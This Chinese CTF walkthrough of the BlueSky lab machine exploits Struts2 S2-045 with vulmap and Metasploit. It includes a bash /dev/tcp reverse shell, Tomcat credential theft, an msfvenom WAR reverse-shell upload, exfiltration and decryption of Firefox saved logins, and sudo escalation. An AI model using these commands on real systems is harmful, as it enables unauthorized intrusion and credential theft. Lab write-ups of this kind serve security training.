bluesky

靶机 BlueSky

信息搜集

存活检测

image-20230930150506031

详细扫描

  • 发现开放了 22 端口和 8080 端口

    image-20230930155034507

  • 访问 8080 端口

    在这里插入图片描述

    查看源代码未发现有用信息

  • 后台扫描image-20230930152239606

  • 无有用信息

漏洞复现

  • 搜索漏洞,存在 struts 远程代码执行漏洞

    路径 http://192.168.245.144:8080/struts2-showcase/index.action

    image-20230930155855695

  • 启动漏洞扫描工具 vulmap

    python3 vulmap.py 
    

    image-20230930175547586

    搜索 struts 漏洞

    python3 vulmap.py -u http://192.168.245.144:8080/struts2-showcase/index.action -a struts2
    

    image-20230930180216058

    显示存在漏洞

  • msf 搜索漏洞

    search s2-045
    

    image-20230930180408207

  • 配置并运行

    image-20230930180541277

    成功连接

    image-20230930180610535

  • 反弹 shell

    bash -c 'bash -i >& /dev/tcp/192.168.245.128/8888 0>i'
    

Webshell

  • 查看viminfo文件 在vim中操作的行为,vim会自动记录下来,保存在 .viminfo 文件中。

    image-20230930194149116

  • 查看 /usr/local/tomcat/conf/tomcat-users.xml

    cat /usr/local/tomcat/conf/tomcat-users.xml
    

    获得了 admin 的账号密码

    image-20230930194259902

  • 登录 manager app

    image-20230930194408091

    输入账号 admin 密码 6mzf3>gfZ.pN8_Mp

  • 登陆成功

    image-20230930195205785

  • 尝试文件上传反弹 shell

    image-20230930195357043

  • 生成后缀未 war 的反弹文件

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.245.128 LPORT=8888 -f war -o shell.war
    

    image-20230930200541186

  • 上传成功

    image-20230930200807960

  • 开启监听,点击 shell.war 连接

    image-20230930200853303

提权

  • 提示符回显

    /usr/bin/script -qc /bin/bash /dev/null
    

    image-20230930201323226

mozilla firefox信息收集

  • 发现 Firefox 文件 .mozilla

    image-20230930202059307

  • 查找用户密码文件

    image-20230930202314684

  • 将两个文件下载到 kali 进行解密

    python3 -m http.server 6666
    

    image-20230930202558526

  • kali 下载

    wget http://192.168.245.144:6666/key4.db
    wget http://192.168.245.144:6666/logins.json
    

    image-20230930202727531

密码解密

  • 下载解密脚本

  • 查看用法

    image-20230930203506058

  • 下载依赖文件

    pip3 install -r rewuirements.txt
    

    image-20230930203712797

  • 将 key4.db 和 logins.json 复制到 firepwd.py 同目录下

  • 运行 firepwd 文件

    python firepwd.py
    
  • 得到账号 minhtuan 密码 skysayohyeah

    image-20230930204221594

  • sudo -l 查看权限

    输入密码

    image-20230930204510074

  • 拥有全部 root 权限

  • 提权

    sudo bash
    

    image-20230930204621547

    提权成功

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值